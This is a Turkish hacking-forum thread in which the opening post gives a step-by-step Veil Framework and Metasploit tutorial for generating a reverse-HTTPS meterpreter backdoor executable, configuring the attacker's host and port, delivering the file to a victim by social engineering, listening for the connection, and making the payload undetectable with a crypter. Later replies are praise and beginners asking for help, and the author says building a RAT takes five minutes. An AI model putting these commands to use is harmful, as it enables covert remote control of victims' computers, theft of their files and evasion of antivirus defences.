İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Veil Framework [Detaylı Anlatım] / Kill4Dead

22-03-2019 16:28
#1
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Herkese merhaba. Bu yazımda "Veil Framework nedir, nasıl kullanılır, işlevleri nelerdir?" bunlardan bahsedeceğim.



Veil Framework



3.1.X



Veil Framework işlevsel bir BackDoor aracıdır. Kısaca değinmek gerekir ise, saldırı altındaki bilgisayar saldırganın bilgisayarı ile iletişime geçer ve saldırı altındaki bilgisayar saldırganın bilgisayarına bağlanır. Adından da anlaşıldığı gibi arka kapıyı açık bırakır. Yani siz istediğiniz zaman saldırı altındaki bilgisayar ile sorunsuz bir şekilde bağlantı kurabilirsiniz.


  1. Pek fazla bir özelliği yoktur aslında. Sade ve öz bir konsol (Terminal) uygulamasıdır.
  2. İstediğiniz zaman; kurbanın bilgisayarına bağlanabilir,
  3. Bütün dosyalarında dolaşabilir,
  4. Dosyalarını bilgisayarınıza indirebilir,
  5. İstediğiniz dosyayı bilgisayarına yükleyebilirsiniz.



GITHUB LINKINE GIT

Kod:
sudo su
cd /(indirmek istediğiniz dizin)
git clone https://github.com/Veil-Framework/Veil


Git Clone ile Veil Framework' u indirdikten sonra aşağıdaki kodları sırası ile uygulayalım.

Kod:
# cd /kayitliolduguklasör/Veil
# ./config/setup.sh --force --silent
# Python Veil.py
# use 1 (Evasion)
# list (Buradan istediğimiz backdoor' u seçiyoruz.)
# use 27 (Biz python/meterpreter/rev_https.py' i seçtik.)
(Şimdi ise gerekli ayarlamaları yapacağız. Hepsinden bahsedemem çok geniş ve her backdoor' da farklı özellikler mevcut. Bunları kurcalayarak bulabilirsiniz.)
# set LHOST 192.168.2.1 (Sizin IP adresiniz ne ise onu girin.)
# set LPORT 8000 (Karşı bilgisayarın bizimle hangi port üzerinden iletişim kuracağını seçiyoruz.)
# set SLEEP 60 (Backdoor' umuz kurban exe dosyasına tıkladıktan 60 saniye sonra aktif olacak.)
# generate (Bütün ayarlamaları yaptıktan sonra generate diyerek Payload' umuzu oluşturuyoruz.)
# payload1 (Payload' ımızın adını istediğimiz gibi giriyoruz.)
# 1 (PyInstaller ile Payload' ın kurulumunu gerçekleştiriyoruz.)
4. resimde gözüktüğü üzere bize kayıtlı olduğu yeri söylüyor. (Executable written to: /var/lib/veil/output/compiled/payload1.exe )
Daha sonra ise ilgili klasörden (/var/lib/veil/output/compiled) payload1.exe isimli arka kapı virüsümüzü sosyal mühendislik yöntemi ile karşı tarafa atacağız.
































Şimdi ise bağlantımızı dinleyebilmemiz için met*asploit isimli programa ihtiyacımız var. Bir çoğumuz bu programı kullanmasakta, kullanımını bilmesekte duymuşuzdur.
Aşağıdaki gibi programı aynı çekilde bilgisayarımıza kuruyoruz.



Kod:
sudo su
cd /(indirmek istediğiniz dizin)
git clone https://github.com/rapid7/****sploit-framework.git
Şimdi ise aşağıdaki komutu yazarak programımızı terminalden çalıştırıyoruz.
Kod:
msfconsole


Evet gördüğünüz gibi programın arayüzü açıldı.





Aşağıdaki kodları çalıştırarak oluşturmuş olduğumuz Payload' ı dinlemeye alıyoruz. (Multi Handler Kullanımı ile)

Kod:
# use /exploit/multi/handler
# show options
# set PAYLOAD windows/meterpreter/reverse_https
# set LHOST (Veil' da girmiş olduğumuz IP)
# set LPORT (Veil' da girmiş olduğumuz PORT)
# exploit (BackDoor' umuzu dinlemeye alıyoruz.)
Artık terminal komutları ile dilediğimiz herşeyi yapabiliriz.



Bir Crypter ile oluşturduğunuz Payload' ı FUD hale getirin ve Veil.py' de ayarları yaparken anti-virüslere takılmamak için bütün ayarları değiştirin.







Kullanıcı İmzası
Cyber Security
Information Systems
Konu Kill4Dead tarafından (22-03-2019 23:42 Saat 23:42 ) değiştirilmiştir.

22-03-2019 17:10
#2
sah mat - ait Kullanıcı Resmi (Avatar)
Siber Güvenlik Ekibi
Üyelik tarihi:
03/2019
Mesajlar:
61
Teşekkür (Etti):
30
Teşekkür (Aldı):
15
Konular:
17
Gerçekten forumda öğrenilmesi gereken bi konu Backdoor hakkında bilmediklerimi konunuz sayesinde öğrendim
SAYGILARIMLA ŞahMat
Kullanıcı İmzası
ARAMIZDAKİ EN KIDEMLİ DERBEDERE
ŞahMat
24-03-2019 00:37
#3
C R P - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2018
Mesajlar:
507
Teşekkür (Etti):
17
Teşekkür (Aldı):
3
Konular:
210
Bu işlerde yeniyim de , linux terminal ile ilgili yardımcı olabilirmisin hocam
24-03-2019 00:45
#4
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Alıntı:
C R P´isimli üyeden Alıntı Mesajı göster
Bu işlerde yeniyim de , linux terminal ile ilgili yardımcı olabilirmisin hocam
Tabi ki. Herhangi bir Linux dağıtımını kullanıyor musunuz? Sanal bilgisayarda veya ana makinede?
Kullanıcı İmzası
Cyber Security
Information Systems
24-03-2019 00:50
#5
C R P - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2018
Mesajlar:
507
Teşekkür (Etti):
17
Teşekkür (Aldı):
3
Konular:
210
Alıntı:
Kill4Dead´isimli üyeden Alıntı Mesajı göster
Tabi ki. Herhangi bir Linux dağıtımını kullanıyor musunuz? Sanal bilgisayarda veya ana makinede?
Hayır , dediğim gibi hiçbir bilgim yok. youtubeden bakarak vs denedim ama ordakiler de sıfırdan göstermedikleri için yapamadım.
24-03-2019 00:53
#6
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Alıntı:
C R P´isimli üyeden Alıntı Mesajı göster
Hayır , dediğim gibi hiçbir bilgim yok. youtubeden bakarak vs denedim ama ordakiler de sıfırdan göstermedikleri için yapamadım.
Ben size elimden geldiğince yardımcı olurum ancak sanal bilgisayar kurmanız gerekmekte öncelikle. VirtualBox' u indirip daha sonra Kali Linux veya Parrot OS bu iki işletim sisteminden birini indirmeniz tavsiyemdir. Pentesting üzerine tasarlanmış sistemlerdir. Daha sonrası oldukça basit RAT oluşturmanız 5 dakikanızı alacaktır.
Kullanıcı İmzası
Cyber Security
Information Systems
28-03-2019 21:00
#7
alicanbeyx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Mesajlar:
16
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Konular:
2
merhaba bu konularda yeniyim yardımcı olmanız münkün mü acaba minnettar kalırım
28-03-2019 22:29
#8
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.462
Teşekkür (Etti):
163
Teşekkür (Aldı):
258
Konular:
174
Alıntı:
alicanbeyx´isimli üyeden Alıntı Mesajı göster
merhaba bu konularda yeniyim yardımcı olmanız münkün mü acaba minnettar kalırım
Herşeyi tam olarak anlatamam ancak yol gösterebilirim. Buyrun.
Kullanıcı İmzası
Cyber Security
Information Systems

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı